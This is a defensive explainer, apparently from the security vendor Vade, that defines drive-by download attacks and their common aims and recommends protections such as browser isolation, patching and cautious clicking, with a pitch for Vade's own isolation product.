A drive-by download refers to a malicious technique used by cybercriminals to infect a user's computer or device with malware without their knowledge or active participation. It occurs when a user visits a compromised website or clicks on a malicious link, triggering the automatic download and installation of malware onto their system.
Drive-by downloads are often used to exploit vulnerabilities in web browsers, plugins, or other software to gain unauthorized access to a user's device. Most often, these vulnerabilities are found in out of date browsers, apps, or even operating systems that have security flaws.
How does a drive-by download work?
Drive-by downloads exploit security flaws to infect a user’s device with malware. These attacks often use legitimate, yet compromised websites to infect a user’s device with malware.
Often when a user visits the compromised site, malicious code is executed, which automatically downloads and installs it on the user’s local machines.
This attack occurs without the knowledge of the targeted victim. Other variations of this attack require the user to click on a link or install a trojan disguised as a legitimate software alert.
Drive-by downloads are most often intended to accomplish one of the following malicious activities:
Spying on your activity with the intent to steal credentials, financial data, or personal identity information.
Steal computer resources with the intent of establishing a botnet, mining cryptocurrency, or otherwise run in the background of the user’s computer.
Use the computer as an entry point to a wider corporate network, or other personally connected devices.
Install ransomware and hold data or the device hostage.
Simply install malware to ruin data, cause trouble, or harm the user or business.
How to prevent drive-by download attacks
To protect against drive-by downloads, consider adopting the following security measures:
Adopt a remote browser isolation (RBI) solution: Use RBI technology to protect your browsing activity. RBI solutions load browsing sessions in a secure container, or sandbox environment, that is remotely hosted and completely isolated from your local device and network. Any malicious code that may try to install itself is executed on a virtual machine, rather than your users’ actual devices, preventing the download from successfully installing. Vade Remote Browser Isolation (RBI) enables users to securely visit browsers directly from potentially malicious email-based links. Vade RBI prevents all types of drive-by download attacks that originate from email-borne threats.
Update your software regularly: Keep your systems and software up to date to minimize software vulnerabilities and take advantage of the latest released patches.
Enable automatic updates: Configure your browser, business applications, and operating system to automatically download and install security updates. This ensures that you receive critical security patches as soon as they become available, reducing the risk of drive-by downloads.
Practice cyber vigilance: Stay cautious when interacting with links and visiting unfamiliar websites. Hover over links to verify their legitimacy before clicking them and avoid downloading files from unknown sources.
